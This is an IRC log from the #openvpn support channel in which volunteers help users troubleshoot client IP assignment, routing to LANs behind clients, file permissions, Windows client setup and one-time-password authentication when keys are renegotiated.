03:47 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
03:47 <@krzee> theres some flowcharts for troubleshooting lans behind openvpn
03:47 <@krzee> if you remember and treat any subnet behind the other peer as a "lan" then the flowcharts should help
03:48 <@krzee> if you get stuck, tcpdump is your friend, use it everywhere on the tun devices
03:56 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn
04:00 -!- niervol1 [~krystian@193.106.244.150] has joined #openvpn
04:00 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has quit [Client Quit]
04:01 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has joined #openvpn
04:01 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 260 seconds]
04:09 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn
04:09 < oskie> hello. is it normal for OpenVPN to assign all clients the same IP address?
04:10 < oskie> (with tun config)
04:10 <@krzee> no, you need to use different certs for each client
04:10 <@krzee> you are only using 1 now, for testing, right?
04:10 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Remote host closed the connection]
04:11 -!- valparaiso is now known as valparaiso_reset
04:11 -!- valparaiso_reset is now known as valparaiso
04:11 < oskie> krzee: I'm using openvpn-auth-ldap and client-cert-not-required
04:11 <@krzee> oh
04:11 <@krzee> !authpass
04:11 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name
04:11 <@krzee> use username-as-common-name
04:12 < oskie> yeah, I'm using that too, but clients still receive the same IP... is that normal? I mean, does routing even work?
04:12 < oskie> or something is very wrong
04:12 <@krzee> no, they must be bumping each other off
04:12 <@krzee> lemme see your server config
04:13 < oskie> yeah because that's what I think is happening right now
04:13 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn
04:13 < oskie> hmm should I paste it somewhere?
04:13 <@krzee> yep
04:13 <@krzee> without all the comments if it has them
04:14 <@krzee> type !configs if you need to know how to strip them
04:16 -!- valparaiso [~valparais@ARennes-257-1-67-126.w81-53.abo.wanadoo.fr] has left #openvpn []
04:17 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn
04:18 -!- brute11k [~brute11k@89.249.230.92] has quit [Ping timeout: 260 seconds]
04:18 < oskie> hmm but I use client config files as well
04:18 < oskie> let's use pastebin or something, wait
04:19 < oskie> http://pastebin.com/t6EyL0pL
04:19 -!- amir_ [~amir@unaffiliated/amir] has quit [Ping timeout: 256 seconds]
04:20 <@krzee> perfect
04:20 <@krzee> and the ccd file[s]
04:21 < oskie> they are simple: there is one file for each access level. they have one line: ifconfig-push 10.9.x.1 10.9.x.2
04:21 < oskie> and there are multiple users for each group (maybe that's the problem)
04:21 <@krzee> 10.9.1.0 and 10.9.2.0 are behind clients and 10.8.0.0/16 is behind the server, right?
04:21 < oskie> yep! 10.9.0.0 is client as well
04:22 <@krzee> let me see a server log at verb 4 with a client connecting, then another connecting
04:23 <@krzee> you can hide public ips if you like
04:23 < oskie> that's going to be a lot of text...
04:23 <@krzee> yes, it is
04:23 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer]
04:23 <@krzee> pastebin wont mind ;]
04:25 < oskie> but let me first ask: can I even use ifconfig-push 10.9.1.1 10.9.1.2 for two different users? will they not get the same IP?
04:25 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
04:26 <@krzee> definitely dont do that
04:26 <@krzee> i dont know what will happen
04:26 < oskie> ok then that's my problem
04:27 < oskie> but I can't seem to use ifconfig-pool in the client config files
04:27 <@krzee> right
04:27 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Quit: leaving]
04:28 <@krzee> you can code a client-connect script if you need that flexibility
04:28 < oskie> so is there a way to dynamically assign multiple users to a different subnet than the default
04:28 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn
04:28 <@krzee> !iporder
04:28 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
04:28 < oskie> ah, ok
04:30 < oskie> if I make such a script, I need to figure out how to dynamically select IPs
04:30 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 264 seconds]
04:30 < oskie> and then write that as "ifconfig-push X Y" in the tmpfile?
04:30 <@krzee> right
04:31 <@krzee> dynamic selection should be easy enough, 6, 10, 14, 18 etc etc
04:31 < oskie> and that's "ifconfig-push SERVERIP CLIENTIP" right?
04:31 <@krzee> oh and 1 since its not the servers subnet
04:31 <@krzee> !static
04:31 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
04:32 <@krzee> clientip serverip
04:32 <@krzee> well kinda
04:32 < oskie> ah ok!
04:32 <@krzee> clientip internal-to-openvpn-ip
04:32 <@krzee> which represents the server ip for routing purposes
04:32 < oskie> but both need to be dynamic? I can't use the same serverip for all clients, can I?
04:33 <@krzee> both change
04:33 <@krzee> .2 .1 .6 .5 .10 .9
04:33 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn
04:33 < oskie> hm, you're skipping .4 and .3?
04:34 <@krzee> skipping 4
04:34 <@krzee> the 3 was you doing math bad ;]
04:36 <@krzee> in your topology, if it is ifconfig-push x y, then y is always 1 less than x
04:36 <@krzee> and they both increase by 4 to the next /30
04:36 <@krzee> !/30
04:36 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
04:36 < oskie> ah ok
04:37 <@krzee> you dont want to use topology subnet
04:37 < oskie> now I just need to code a client-connect script that checks user group in Active Directory and assigns IP based on that
04:37 < oskie> why not topology subnet?
04:37 <@krzee> because clients can change their ip with ifconfig
04:37 < oskie> ah ok
04:37 <@krzee> however with net30 (default) they cant reach the server after doing so
04:38 <@krzee> since you are doing a lot based on ip, that is important
04:38 <@krzee> (i assume the separation of subnets is for firewall rules)
04:39 < oskie> does that mean that a user can disrupt another user by changing his IP in topology=subnet?
04:39 < oskie> or I mean in topology mode
04:39 <@krzee> you said it right, topology subnet
04:40 <@krzee> and i dont know, may as well test it though :D
04:49 < oskie> great, I think that did it. many thanks krzee!
04:49 <@krzee> yw =]
04:50 < oskie> is it possible to for two openvpn instances to share the same --server ip address?
04:50 <@krzee> no
04:50 < oskie> ok, good
04:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
05:03 < pppingme> as in the ip's assigned to clients? no
05:11 -!- gardar [~gardar@gardar.net] has joined #openvpn
05:14 -!- smooc [~smooc@62.28.98.58] has joined #openvpn
05:23 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Remote host closed the connection]
05:31 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
05:42 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
05:46 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
05:46 < videl> Hi
05:57 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
06:04 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Read error: No route to host]
06:07 -!- pi_ [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
06:07 -!- pi_ is now known as videl
06:07 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
06:10 -!- brute11k [~brute11k@89.249.231.11] has joined #openvpn
06:20 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 276 seconds]
06:22 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 265 seconds]
06:45 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
07:00 -!- smooc [~smooc@62.28.98.58] has quit [Read error: Connection reset by peer]
07:17 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has joined #openvpn
07:17 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has quit [Changing host]
07:17 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
07:39 -!- brute11k [~brute11k@89.249.231.11] has quit [Ping timeout: 240 seconds]
08:02 -!- mattock_afk is now known as mattock
08:03 -!- brute11k [~brute11k@89.249.231.106] has joined #openvpn
08:12 < fys> ugh .. today i go to the dentist for the first time in around 4 years.
08:22 -!- m0sphere [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer]
08:23 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn
08:23 -!- moore1 [~moore@41.206.15.31.vgccl.net] has joined #openvpn
08:28 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
08:36 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
08:37 -!- smooc [~smooc@62.28.98.58] has joined #openvpn
08:48 -!- Porkepix [~Porkepix@dispo-82-248-141-132.adsl.proxad.net] has quit [Ping timeout: 245 seconds]
08:50 -!- emate [~marcin@81.219.183.142] has quit [Quit: leaving]
08:50 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has joined #openvpn
08:57 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has joined #openvpn
08:58 -!- moore1 [~moore@41.206.15.31.vgccl.net] has quit []
08:59 < dvl-_> I have a working OpenVPN 2.2.2 routed solution on FreeBSD 8.2 and now I'm trying to make it run as openvpn:openvpn, not nobody:nobody. The problem is /usr/local/etc/openvpn/keys/crl.pem
08:59 < dvl-_> CRL: cannot read: /usr/local/etc/openvpn/keys/crl.pem: Permission denied (errno=13)
08:59 < dvl-_> However: # ls -l /usr/local/etc/openvpn/keys/crl.pem
08:59 < dvl-_> -r--r--r-- 1 openvpn openvpn 499 Feb 26 2009 /usr/local/etc/openvpn/keys/crl.pem
09:00 < dvl-_> oh.... wait... :)
09:00 < dvl-_> fixed. :)
09:01 < dvl-_> it was /usr/local/etc/openvpn still root:wheel
09:04 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 245 seconds]
09:13 <@ecrist> :)
09:16 < dvl-_> Love it when explaining finds the problem.
09:16 < dvl-_> ecrist FYI: writing a post on ssl-admin for http://dan.langille.org/ ... should be ready latest today.
09:17 < dvl-_> ecrist I keep seeing this FAIL but no message:
09:17 < dvl-_> Creating initial CRL...Using configuration from /usr/local/etc/ssl-admin/openssl.conf
09:17 < dvl-_> Enter pass phrase for /usr/local/etc/ssl-admin/active/ca.key:
09:17 < dvl-_> FAILssl-admin installed Wed Jan 2 15:16:46 UTC 2013
09:17 -!- niervol1 [~krystian@193.106.244.150] has quit [Remote host closed the connection]
09:17 < dvl-_> See that FAIL? Kind of.. .confusing.
09:18 < dvl-_> if I quit and go back into ssl-admin, no errors.
09:21 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
09:24 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn
09:26 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 240 seconds]
09:30 <@dazo> dvl-_: using chroot?
09:30 <@dazo> duh ... you found the issue
09:37 <@ecrist> dvl-_: that FAIL message is a red herring
09:38 <@ecrist> something i've never bothered fixing
09:38 <@ecrist> I'll fix it soon, since you've noticed/pointed it out
09:40 < dvl-_> ecrist: OK, I'll mention that in the article.
09:41 < dvl-_> dazo: no, no chroot involved, but that's an interesting idea. All I'm doing is running openvpn as openvpn:openvpn and chown/chmod all the files so only openvpn can read them.
09:46 < dvl-_> ecrist: I can create tickets at https://www.secure-computing.net/trac/report if you like? I have other items you might want to look at (e.g. spelling)
09:46 <@vpnHelper> Title: Available Reports – SCN Open Source (at www.secure-computing.net)
09:46 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Quit: leaving]
09:49 <@ecrist> dvl-_: that would be excellent!
09:50 < dvl-_> ecrist: will do. :)
09:50 <@ecrist> I think I need to get a user/pass from you, since that uses .htaccess for auth
09:51 -!- smooc_ [~smooc@95.69.51.167] has joined #openvpn
09:51 <@ecrist> anon ticket creation is disabled (spam)
09:52 -!- smooc [~smooc@62.28.98.58] has quit [Ping timeout: 252 seconds]
10:11 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
10:21 -!- master_of_master [~master_of@p57B55644.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
10:23 -!- master_of_master [~master_of@p57B556D3.dip.t-dialin.net] has joined #openvpn
10:26 -!- EmperorTom [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn
10:27 -!- EmperorTom is now known as _quadDamage
10:44 -!- hjf [~hjf@184-0-17-190.fibertel.com.ar] has quit [Remote host closed the connection]
10:55 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
10:56 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Ping timeout: 240 seconds]
11:00 -!- raidz_away is now known as raidz
11:01 -!- krzee [~k@openvpn/community/support/krzee] has joined #openvpn
11:01 -!- mode/#openvpn [+o krzee] by ChanServ
11:09 -!- EugeneKay [eugene@itvends.com] has quit [Quit: ZNC - http://znc.in]
11:09 -!- EugeneKay [eugene@go-without.me] has joined #openvpn
11:33 -!- plaisthos [~arne@kamera.blinkt.de] has joined #openvpn
11:35 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
11:41 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection]
11:55 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection]
11:58 -!- butch128 [~butch@TOROON63-1176061240.sdsl.bell.ca] has joined #openvpn
11:58 -!- smooc_ [~smooc@95.69.51.167] has quit [Ping timeout: 248 seconds]
11:59 < butch128> Trying to get routing working between my openvpn server, and 2 subnets i have connecting to it - anyone willing to comment on what I'm doing wrong?
12:01 < kisom> butch128: My car wont start, any comment on what I'm doing wrong?
12:02 <+pekster> Are these subnets behind your OpenVPN server or your clients?
12:02 < butch128> kisom: point taken, sec
12:02 < butch128> My setup is... OpenVPN Server (10.8.0.1), DD-WRT-1 (10.8.0.6, 192.168.5.0/24) DD-WRT-2 (10.8.0.18, 192.168.1.0/24). From a machine on either subnet (say 192.168.1.100) i'd love to be able to just connect to 192.168.5.1.
12:02 <+pekster> !clientlan
12:02 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
12:02 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
12:02 < butch128> yep, ipforwarding is enabled
12:02 < butch128> ive added ccd files
12:03 < butch128> and iroute push entries
12:03 <+pekster> Have you seen that flowchart? And followed it?
12:03 < butch128> (on the server)
12:03 < butch128> i will do that now, thanks
12:03 <+pekster> That flowchart walks you through every step you need to get client-LAN connectivity set up. Feel free to ask here if you get stuck and need help, but the author of that diagram put time into making it very complete ;)
12:04 <+pekster> (just be sure not to skip steps :P )
12:04 < butch128> so i'm at the final step "Add a route to the router so it knows how to reach the vpn subnet"
12:04 < kisom> butch128: If you get stuck, paste your config files, routing table, iptables rules and ifconfig output somewhere and I'll have a look.
12:04 < butch128> from the router (192.168.1.1) i can ping 192.168.5.1! and its awesome!
12:05 < butch128> from my home machine though (192.168.1.100) i cannot...
12:05 <+pekster> butch128: Are your VPN clients (your *WRT devices) the default router on their respective networks?
12:05 < butch128> thanks, i'll paste the route and such
12:05 < butch128> yes, they are the defaults
12:05 <+pekster> Yea, then configs, logs, and routing views would help. Since they're the defaults, something sounds off with your routing setup (or possibly your firewalls)
12:05 < butch128> yea, turned off the firewalls too... no go
12:06 < kisom> butch128: Can you paste your stuff here? http://piratepad.net/openvpn
12:06 <@vpnHelper> Title: PiratePad: openvpn (at piratepad.net)
12:07 < butch128> http://piratepad.net/ep/pad/view/ro.rzwEcZAY/latest
12:08 <@vpnHelper> Title: PiratePad: ro.rzwEcZAY / Latest text of pad openvpn (at piratepad.net)
12:10 < kisom> butch128: Lots of routers and servers... I'll probably need a diagram on how everything is connected
12:11 < butch128> hmmm
12:11 < butch128> Server (10.8.0.1)
12:11 < butch128> Router#1 (192.168.1.1, 10.8.0.18), Router #2 (192.168.5.1, 10.8.0.1)
12:12 < butch128> two routers connect to server
12:12 < butch128> all that works smashingly well
12:12 < kisom> OK, and the server routes traffic between your routers?
12:12 < butch128> it seems to, from Router #1 (192.168.1.1) i can ssh into 192.168.5.1 (router #2)
12:13 < butch128> hmm... interesting... i didnt try this before.. from router #2 (192.168.5.1) i cannot access router#1... (192.168.1.1)... even though firewalls are disabled and the route table looks correct... that could be my problem, maybe?
12:15 <+pekster> butch128: Can you do that from the VPN server?
12:15 <+pekster> (ie: the flowchart block that asks "Can you ping the lan IP of the client?" )
12:15 < kisom> butch128: Can you please paste your iptables config and ifconfig on the server?
12:15 < butch128> root@li169-68:/etc/openvpn# ping 192.168.5.1
12:15 < butch128> PING 192.168.5.1 (192.168.5.1) 56(84) bytes of data.
12:15 < butch128> 64 bytes from 192.168.5.1: icmp_seq=1 ttl=64 time=90.0 ms
12:15 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
12:15 < butch128> huh...
12:16 < butch128> root@li169-68:/etc/openvpn# ping 192.168.1.1
12:16 < butch128> PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
12:16 < butch128> ^C
12:16 < butch128> --- 192.168.1.1 ping statistics ---
12:16 < butch128> 4 packets transmitted, 0 received, 100% packet loss, time 2999ms
12:16 < butch128> so it only pings one way...
12:16 <+pekster> Sounds like firewall. kisom's suggestion of looking at iptables rules is a good next troubleshooting step
12:16 < kisom> Yes, really sounds like a firewall
12:16 < kisom> Pings do not go "one way"
12:16 < kisom> :P
12:17 < butch128> hmmm k
12:17 <+pekster> Well, the echo-request does, but that's getting off-topic :P
12:17 < butch128> thanks, i'll double check when i'm home whether its disabled... grr
12:17 < butch128> but almost 100% it is...
12:17 < butch128> thanks for the help, it sounds like i didnt miss a step in the config then?
12:18 < kisom> Probably not since you can ping "one way" over the VPN.
12:18 <+pekster> Both clients have a good looking routing view (they route to each other's LANs across the VPN) so my guess is your firewall isn't allowing it on the "dark" system (the one you can't reach)
12:18 < butch128> yea, k
12:19 <+pekster> If you explicitly trust all traffic coming across the secured VPN pipe, something like this tends to work well: '-A INPUT -i tun+ -j ACCEPT' and '-A FORWARD -i tun+ -j ACCEPT'
12:19 <+pekster> Tune for more security if you require it
12:20 <@krzee> ild use -I over -A but yep
12:20 < butch128> k, thanks, i'll try that too
12:20 <+pekster> krzee: That's in iptables-restore syntax ;)
12:20 < kisom> I just woke up, btw
12:20 < butch128> i turned off the firewall in dd-wrt, guess that may not have been enough
12:20 < kisom> 7 PM over here
12:20 <+pekster> Depends on what "turning off" actually does :\
12:20 < butch128> very true
12:21 <+pekster> But yea, if your client can ping the server, but server can't ping the client's LAN IP, it sounds very much like your firewall on that client needs fixing
12:22 <@krzee> if you actually "turned off" the firewall in dd-wrt it would stop doing nat and therefore probably not do what you expect of it
12:22 < chrisb> any issues with using OTP PAM with openvpn authentication? on reconnect?
12:23 <@krzee> i believe that depends on settings
12:23 <@krzee> you can use persist settings and keep it cached in memory
12:24 <+pekster> chrisb: Every re-keying event (1h by default) it'll require a full re-auth (certs and un/pw if you use it), so if the OTP changes between uses like a true OTP would, that will cause problems. You can probably do something creative with the management interface and not caching the credentials
12:25 < kisom> Disabling re-keying is an option too
12:25 < kisom> :)
12:26 <+pekster> Sure.
12:26 <+pekster> Once every "never" you will need to re-key :P
12:26 < chrisb> this would be yubikey, so yes, real OTP
12:26 <@krzee> oh right i forgot bout that lol
12:26 <@krzee> caching a changing pw doesnt help much lol
12:26 <+pekster> chrisb: My recommendation would be to write a un/pw script that requires the actual OTP for the first auth only, then silently "passes" the user through auth without doing any further checking when it's a re-key
12:27 < chrisb> i have always had persist set, because i think my connection is too dodgy
12:27 <+pekster> chrisb: The env-vars available to the script will let you determine if it's a new or existing connection being authenticated
12:27 <+pekster> That does mean you can't use the ovpn PAM plugin as-is, though
12:27 <@krzee> persist is handy when dropping permissions and having your keys properly chmod'ed
12:28 <@krzee> ^ ild go with pekster's option
12:28 <@krzee> that way you keep forward security
12:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
12:32 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
12:35 < chrisb> interesting, thanks for these comments
12:36 < chrisb> pekster: what do you mean by "un/pw script"?
12:36 <+pekster> --user-auth-pass-verify
12:36 -!- butch128 [~butch@TOROON63-1176061240.sdsl.bell.ca] has left #openvpn []
12:37 < kisom> How does OpenVPN prompt the user for one time passwords btw?
12:43 < |Mike|> why not work with certs? ;x
12:44 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
12:49 < chrisb> |Mike|: i use certs now, i think OTP is better
12:49 < chrisb> |Mike|: am i wrong?
12:54 <@ecrist> you are
12:54 <@ecrist> using both would be good, though
13:00 < dvl-_> ecrist : yes, I need a login for your trac
13:02 < dvl-_> ecrist I just emailed you. :)
13:08 <@ecrist> kk
13:09 <@ecrist> want to pm me a password?
13:10 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:13 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has left #openvpn []
13:14 -!- dvl-_ [~dan@pool-71-162-210-170.phlapa.fios.verizon.net] has joined #openvpn
13:14 < dvl-_> oops
13:14 -!- Syndrom [~syndrom@46.249.58.73] has left #openvpn []
13:17 -!- dazo is now known as dazo_afk
13:18 < chrisb> ecrist: what is the reasoning that cert + OTP is better than OTP?
13:18 < chrisb> ecrist: the encryption of the data channel?
13:19 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn
13:20 < chrisb> http://www.schneier.com/blog/archives/2012/12/china_now_block.html
13:20 <@vpnHelper> Title: Schneier on Security: China Now Blocking Encryption (at www.schneier.com)
13:35 < kisom> Guess the chinese firewall got stateful
13:35 < kisom> Then again, they do not _block_ anything
13:35 < kisom> They just send RST packets
13:35 < kisom> Or at least they did a while back
13:36 <+rob0> RST is TCP. They're detecting openvpn on UDP.
13:37 < kisom> Yeah, I know
13:42 -!- brute11k [~brute11k@89.249.231.106] has quit [Quit: Leaving.]
13:50 <@ecrist> chrisb: because OTP can be shared between users a little easier than certificates.
13:50 <@ecrist> certificates can be revoked
13:51 -!- Devastator [~devas@186.214.14.80] has joined #openvpn
13:51 -!- Devastator [~devas@186.214.14.80] has quit [Changing host]
13:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
13:55 < chrisb> ecrist: meaning that if my OTP list is stolen or copied, i may not be able to remedy, but with certs, i can issue the revocation if I own the CA?
13:59 < dvl-_> I'm not using keys with my certificates for OpenVPN. I don't see the benefit of using keys.
13:59 -!- baobei_ [~baobei@208.111.39.160] has joined #openvpn
13:59 < dvl-_> Reasoning: if they can steal a cert, they can steal a key......
14:00 < dvl-_> Unless, I supply the key each time openvpn starts up.
14:00 < dvl-_> Don't really want to do that....
14:01 -!- baobei__ [~baobei@208.111.39.160] has joined #openvpn
14:01 -!- baobei_ [~baobei@208.111.39.160] has quit [Read error: Connection reset by peer]
14:11 -!- Mimiko [~Mimiko@89.28.88.177] has quit []
14:25 <@ecrist> chrisb: that's one train of thought
14:25 <@ecrist> though, it's fairly easy to re-issue one-time passwords, as well
14:26 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 245 seconds]
14:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
14:43 <@ecrist> dvl-_: most people, I would guess, don't password-protect their client-side keys
14:46 -!- krzee [~k@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
14:50 < dvl-_> ecrist: I'm not protecting my server side cert. The CA is password protected...
14:50 <@ecrist> that's also probably common
14:58 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has joined #openvpn
14:58 -!- ade_b [~Ade@koln-5d81bfd4.pool.mediaWays.net] has quit [Changing host]
14:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
15:00 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
15:08 -!- Konigsberg7 [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
15:08 -!- Konigsberg7 [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood]
15:09 -!- shawnz [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn
15:09 -!- whyz [~e@h145n7-n-a31.ias.bredband.telia.com] has left #openvpn ["Leaving"]
15:09 -!- shawnz is now known as Konigsberg7
15:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
15:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
15:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
15:24 -!- mode/#openvpn [+o krzee] by ChanServ
15:45 -!- Konigsberg7 [shawnz@c-67-163-13-78.hsd1.il.comcast.net] has quit [Ping timeout: 255 seconds]
16:32 < ade_b> I have my own openvpn server and I have setup my girlfriends linux laptop to use it - how do I do this for a windows laptop
16:33 < ade_b> I cant see anywhere in the windows client to specify the certificates
16:33 < ade_b> I guess I need to create a "Connection Profile" to import - can anyone help me out?
16:36 < ngharo> You create a config and name it with an extension of .ovpn
16:37 -!- baobei__ [~baobei@208.111.39.160] has quit [Ping timeout: 245 seconds]
16:37 < ngharo> the config should look the same as linux except specify 'dev-node' instead of 'dev' iirc
16:49 < plaisthos> ngharo: dev tun/dev tap work fine on windows
16:49 < ade_b> ngharo, ok thanks
16:49 < ngharo> thought you had to match 'dev-node' with the name of the tap interface
16:50 <@krzee> ngharo, you renaming it?
16:50 < ngharo> not me, ade_b
16:50 <@krzee> ahh right
16:50 < ngharo> i shouldnt even be commenting on windows setup. It's been a while since i've done that
16:50 <@krzee> dev-node isnt needed unless renaming
16:51 < ngharo> oh ok
16:52 <@krzee> you know offhand if when i dd a drive to another drive, if all partition info and gpart info gets copied over?
16:52 < ade_b> ngharo, thanks and I put the certs in her "Docs & Settings folders" and just specify the full path?
16:52 < ngharo> ade_b: yep or for easy mode just place them in the ovpn config directory
16:53 < ngharo> krzee: it should.
16:53 < ngharo> pretty sure all the partition info is stored at the beginning of the drive
16:54 < plaisthos> krzee: yes. For gpt you should run gdisk or similar to fix the backup table (it is normally located at the end of the disk) if you are copying to a larger disc
16:55 < ade_b> great, Im using tun interfaces for linux, so I need to change that to tap on Windows?
16:56 <@krzee> the disk is EXACTLY the same size =]
16:58 < ngharo> ade_b: I don't believe so
16:58 <@krzee> ade_b, you must use tun in windows too
16:58 <@krzee> all sides must agree
16:59 <@krzee> in windows they call it a tap device, but it supports tun mode
16:59 -!- Eagleman7 [~androirc@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
16:59 <@krzee> i have requested a name change to "tuntap device" but it didnt stick
17:00 <+pekster> krzee: The code uses 'tun.c' anyway :P
17:00 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 240 seconds]
17:01 < ade_b> ngharo, krzee thanks
17:01 < plaisthos> pekster: in (very) old version of the windows tap driver, only tap was possible :)
17:02 <+pekster> Ah, hence the device name. Ah well, it'll go well with 'Referer' headers :P
17:03 <@krzee> hah i didnt know there was a time when it was actually tap only
17:03 <@krzee> i guess it makes sense tho, tun emulation mode would kinda have to come after
17:04 -!- mode/#openvpn [+v plaisthos] by krzee
17:07 -!- Eagleman7 [~androirc@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )]
17:12 -!- baobei_ [~baobei@58.37.20.245] has joined #openvpn
17:24 -!- F^4 is now known as F^4[A]
17:31 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
17:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
